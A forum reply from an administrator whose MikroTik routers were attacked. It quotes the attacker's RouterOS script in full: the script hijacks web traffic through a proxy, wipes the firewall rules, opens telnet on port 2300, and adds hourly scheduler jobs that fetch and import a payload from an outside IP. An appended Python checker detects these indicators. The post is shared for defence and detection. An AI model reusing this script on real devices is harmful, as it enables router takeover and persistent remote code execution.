Hi,
I have had a similar experience. A few machines were attacked, but the damage was zero. We had two types here; one died on permissions and did not manage to clean up the main script, and the defense can be worked out from that, so maybe it will help someone:
/ip dns set servers=8.8.8.8
/ip proxy set enabled=yes
/ip proxy access add action=deny disabled=no
/ip firewall nat remove
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall nat move destination=0
/ip firewall filter remove
/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=15s comment=sysadminpxy
/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=webproxy/error.html
/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=flash/webproxy/error.html
/ip dns set servers=8.8.8.8
/ip service set www disabled=yes port=80
/ip service set telnet disabled=no port=2300
/ip service set winbox disabled=no port=8291
3s
/system scheduler add name="udpll3" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=webproxy/error.html" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll4" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=flash/webproxy/error.html" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll5" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/u113.exe mode=http dst-path=u113.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll6" interval=1.01h start-time=startup on-event="/import u113.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/ip cloud set ddns-enabled=yes
/file remove u113.rsc
The other one was more sophisticated, but fortunately the bastard did not get through to other machines either:
[image: aa.png]
[image: bb.png]
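
Added example, not part of the original post: a small Python check that looks for the settings applied by the script quoted above, in either RouterOS `/export` output or a list of one-line commands. The rule names, the sample configuration and the 192.0.2.10 address are constructed for illustration.

```python
import re

# (finding, menu prefix, pattern over the command's arguments). Indicators come from
# the script quoted in the post; the rule names are made up for this example.
RULES = [
    ("scheduler-fetch", "/system scheduler", r"on-event=.*?/tool fetch\b"),
    ("scheduler-import", "/system scheduler", r"on-event=.*?/import\b"),
    ("nat-redirect-to-proxy", "/ip firewall nat", r"(?=.*\baction=redirect\b)(?=.*\bto-ports=8080\b)"),
    ("web-proxy-enabled", "/ip proxy", r"^set\b.*\benabled=yes\b"),
    ("telnet-nonstandard-port", "/ip service", r"^set telnet\b.*\bport=(?!23\b)\d+"),
    ("marker-comment", "/ip firewall", r'\bcomment="?sysadminpxy\b'),
]
MENU = re.compile(r"(/[a-z0-9 -]+?)(?:\s+((?:add|set|remove|move)\b.*))?$")

def scan(config_text):
    """Return [(finding, menu, arguments)] for /export output or one-line commands."""
    findings, menu = [], ""
    text = re.sub(r"\\\r?\n\s*", "", config_text)  # join wrapped export lines
    for line in map(str.strip, text.splitlines()):
        if line.startswith("/"):
            m = MENU.match(line)
            if not m:  # e.g. "/tool fetch ..." typed directly, not a menu path
                continue
            menu, line = m.group(1), m.group(2) or ""
        if not line or line.startswith("#"):
            continue
        for name, where, pattern in RULES:
            if menu.startswith(where) and re.search(pattern, line):
                findings.append((name, menu, line))
    return findings

# Constructed sample in /export layout (not from a real router); 192.0.2.10 is a
# documentation address standing in for the download host.
SAMPLE = r'''/ip proxy
set enabled=yes
/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
    src-address-list=!Ok to-ports=8080
add action=masquerade chain=srcnat out-interface=ether1
/ip service
set telnet port=2300
/system scheduler
add interval=1h name=udpll5 on-event="/tool fetch url=http://192.0.2.10/x mode=http dst-path=x.rsc"
add interval=1d name=backup on-event="/system backup save name=daily"
'''

if __name__ == "__main__":
    print(*("%s  %s: %s" % f for f in scan(SAMPLE)), sep="\n")
```
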